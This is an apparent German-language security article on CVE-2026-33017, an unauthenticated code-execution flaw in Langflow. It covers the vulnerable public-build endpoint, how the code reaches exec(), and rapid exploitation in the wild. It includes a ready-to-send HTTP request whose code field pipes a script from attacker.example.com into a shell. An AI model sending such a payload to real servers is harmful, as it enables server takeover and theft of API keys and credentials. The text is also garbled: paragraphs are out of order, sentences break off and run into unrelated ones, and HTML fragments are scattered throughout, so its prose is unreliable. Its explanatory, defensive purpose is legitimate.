Drei Monate nach ihrer \u00f6ffentlichen Bekanntmachung z\u00e4hlt CVE-2026-33017 in Langflow zu den folgenreichsten Sicherheitsl\u00fccken des Jahres 2026. Der CVSS-Score liegt bei 10.0, dem h\u00f6chstm\u00f6glichen Wert. Angreifer k\u00f6nnen ohne jede Authentifizierung die vollst\u00e4ndige Kontrolle \u00fcber einen Server \u00fcbernehmen, s\u00e4mtliche gespeicherten Geheimnisse exfiltrieren und sich lateral im Netzwerk ausbreiten. Die ersten aktiven Angriffe erfolgten innerhalb von nur 20 Stunden nach Ver\u00f6ffentlichung des Sicherheitshinweises am 17. M\u00e4rz 2026. Besonders gef\u00e4hrlich war, dass eine als Patch kommunizierte Version (1.8.2) weiterhin vollst\u00e4ndig verwundbar blieb, was tausende Organisationen in falscher Sicherheit wiegte. Unternehmen, die Langflow f\u00fcr KI-Agenten, RAG-Pipelines oder LLM-gest\u00fctzte Workflows einsetzen, riskierten den Verlust ihrer OpenAI- und Anthropic-API-Schl\u00fcssel, AWS-Zugangsdaten und Datenbankpassw\u00f6rter. Der Fall zeigt exemplarisch, wie die rasante KI-Adoption in Unternehmen eine neue Kategorie kritischer Schwachstellen schafft, f\u00fcr die klassische Sicherheitskonzepte oft nicht ausreichen.<\/p>\n\n\n\n
Langflow ist ein quelloffenes, visuelles Framework f\u00fcr den Aufbau von KI-Anwendungen auf Basis gro\u00dfer Sprachmodelle (LLMs). Entwickler verbinden Komponenten per Drag-and-drop in einer grafischen Oberfl\u00e4che, schalten APIs wie OpenAI, Anthropic oder lokale Ollama-Instanzen zusammen und bauen so komplexe Retrieval-Augmented-Generation-Pipelines oder autonome KI-Agenten, ohne umfangreichen Boilerplate-Code schreiben zu m\u00fcssen. Das Repository auf GitHub<\/a> z\u00e4hlt \u00fcber 10.000 Sterne und findet Verwendung bei Startups ebenso wie in Konzernen.<\/p>\n\n\n\n Genau diese Beliebtheit macht Langflow zum attraktiven Angriffsziel. Eine typische Langflow-Instanz verbindet sich gleichzeitig mit Dutzenden externer Dienste: Bezahl-APIs der gro\u00dfen KI-Anbieter, Cloud-Storage-Buckets, SQL-Datenbanken, Vektordatenbanken wie Pinecone oder Weaviate sowie interne Unternehmens-APIs. Wer eine Langflow-Instanz \u00fcbernimmt, h\u00e4lt damit nicht nur Kontrolle \u00fcber das Framework selbst, sondern \u00fcber alle angebundenen Dienste und Daten. F\u00fcr Angreifer ist das ein einziger Angriffspunkt mit maximalem Schadenspotenzial.<\/p>\n\n\n\n Laut Daten aus der PyPI-Paketdatenbank<\/a> geh\u00f6rt das Paket CVE-2026-33017 ist eine unauthentifizierte Remote Code Execution (RCE)-Schwachstelle in Langflow, die aus dem Zusammenspiel zweier Fehlerklassen entsteht: CWE-306 (fehlende Authentifizierung) und CWE-94 (Code-Injection). Der betroffene Endpunkt ist Statt die Flow-Daten aus der sicheren Datenbank zu laden, akzeptiert der Endpunkt direkt vom Angreifer kontrollierte Kein Passwort, kein Token, kein Cookie: Ein einziger HTTP-POST-Request mit einem beliebigen Wert als Der Zeitraum zwischen \u00f6ffentlicher Bekanntmachung und erstem best\u00e4tigtem Angriff betrug bei CVE-2026-33017 nur 20 Stunden. Branchenstudien beziffern den Median f\u00fcr die erste Ausnutzung kritischer CVEs auf 4,4 Tage. Langflow unterschritt diesen Median um mehr als das F\u00fcnffache. Das Sysdig Threat Research Team dokumentierte die ersten aktiven Angriffswellen und stellte fest, dass die Schwachstelle aufgrund ihrer extremen Einfachheit sofort von automatisierten Scanner-Infrastrukturen krimineller Gruppen aufgegriffen wurde.<\/p>\n\n\n\nlangflow<\/code> zu den am h\u00e4ufigsten installierten KI-Framework-Paketen im Python-\u00d6kosystem. Selbst gehostete Instanzen, die \u00fcber das \u00f6ffentliche Internet erreichbar sind, bilden die prim\u00e4re Angriffsfl\u00e4che f\u00fcr CVE-2026-33017. Viele Organisationen deployen Langflow auf internen Servern oder in Cloud-Umgebungen mit \u00f6ffentlichem Zugriff, damit Teams ortsunabh\u00e4ngig an KI-Projekten kollaborieren k\u00f6nnen. Genau diese Konfigurationen liefern Angreifern die notwendige Netzwerkreichbarkeit f\u00fcr den Angriff.<\/p>\n\n\n\nCVE-2026-33017: Technische Analyse der CVSS-10.0-Schwachstelle<\/h2>\n\n\n\n
POST \/api\/v1\/build_public_tmp\/{flow_id}\/flow<\/code>. Dieser Endpunkt ist absichtlich ohne Authentifizierung zug\u00e4nglich, da er f\u00fcr den Aufbau \u00f6ffentlich geteilter Flows konzipiert wurde. Das eigentliche Problem liegt in der Verarbeitung der eingehenden Daten.<\/p>\n\n\n\ndata<\/code>-Parameter im Request-Body. Diese Daten enthalten beliebige Python-Code-Definitionen in den Node-Definitionen des Flows. Dieser Code wird anschlie\u00dfend an Pythons native exec()<\/code>-Funktion \u00fcbergeben, ohne jede Validierung, ohne Sandboxing und mit einem SAFE<\/code>-Flag, das explizit auf 0 gesetzt ist. Das Ergebnis ist vollst\u00e4ndiger Server-Kompromiss mit den Rechten des Langflow-Prozesses.<\/p>\n\n\n\n# Konzeptionelle Darstellung des Angriffsvektors\nPOST \/api\/v1\/build_public_tmp\/beliebige-flow-id\/flow\nContent-Type: application\/json\n\n{\n \"data\": {\n \"nodes\": [{\n \"data\": {\n \"node\": {\n \"template\": {\n \"code\": {\n \"value\": \"__import__('os').system('curl attacker.example.com\/shell.sh | sh')\"\n }\n }\n }\n }\n }]\n }\n}<\/code><\/pre>\n\n\n\nflow_id<\/code> gen\u00fcgt f\u00fcr vollst\u00e4ndigen Server-Kompromiss. Proof-of-Concept-Tests von Sicherheitsforschern best\u00e4tigten eine Erfolgsrate von 100 Prozent \u00fcber mehrere unabh\u00e4ngige Testl\u00e4ufe. Die CISA klassifiziert die L\u00fccke unter CWE-94 als prim\u00e4re Schwachstelle, erg\u00e4nzt durch CWE-306 als beg\u00fcnstigende Bedingung. Beide Klassen zusammen erkl\u00e4ren den maximalen CVSS-Score von 10.0.<\/p>\n\n\n\nTimeline: 20 Stunden von der Offenlegung bis zum ersten Angriff in freier Wildbahn<\/h2>\n\n\n\n